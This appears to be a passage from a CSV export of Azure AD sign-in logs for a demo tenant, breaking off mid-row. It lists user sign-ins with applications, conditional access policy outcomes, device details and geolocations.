+239,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:54.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,98cc469f-40db-0000-54b3-3e2255a3e1d9,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:25,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",429b44fe-fb38-41be-832c-f142dbc21200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,429b44fe-fb38-41be-832c-f142dbc21200,SigninLogs,Sucess,41.90428925,-85.99833679
+240,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:24.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ff4fc9e7-d216-4c6d-89ef-827f8c6c1d3a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f0d90a71-c139-4edc-9002-2dd75ef11200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f0d90a71-c139-4edc-9002-2dd75ef11200,SigninLogs,Sucess,50.6406517,5.572050095
+241,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4467206a-1431-4517-a1a3-1567e4905d6f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6f905d6a-b8b5-48fe-8361-59d7bee51200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6f905d6a-b8b5-48fe-8361-59d7bee51200,SigninLogs,Sucess,33.7984581,-84.38828278
+242,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:58.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,543b102d-ef6b-4d56-8a59-03a45cf8401b,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",41cc5746-ae7e-445a-962a-17f665ea0000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,41cc5746-ae7e-445a-962a-17f665ea0000,SigninLogs,Sucess,36.6404686,-78.26995087
+243,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:53.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c3d52c2c-cd2f-4ec7-a466-47ac981725b5,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 00:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4f5563e9-cd91-4aaf-8dc5-b5eed7630100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4f5563e9-cd91-4aaf-8dc5-b5eed7630100,SigninLogs,Sucess,36.6404686,-78.26995087
+244,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:09.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",46ab66bf-13d5-46c8-a514-03b7e6220400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,46ab66bf-13d5-46c8-a514-03b7e6220400,SigninLogs,Sucess,33.0175209,35.44601059
+245,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bc95ce0a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,87802367-3de7-42c2-ada0-d6bc95ce0a00,SigninLogs,Sucess,33.0175209,35.44601059
+246,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:09.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4c00821d-7bcc-4291-8ba2-3292bfce23e2,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 05:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",23877b62-2023-4ce4-9fb4-bf65090b0a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,23877b62-2023-4ce4-9fb4-bf65090b0a00,SigninLogs,Sucess,36.6404686,-78.26995087
+247,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:29.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': 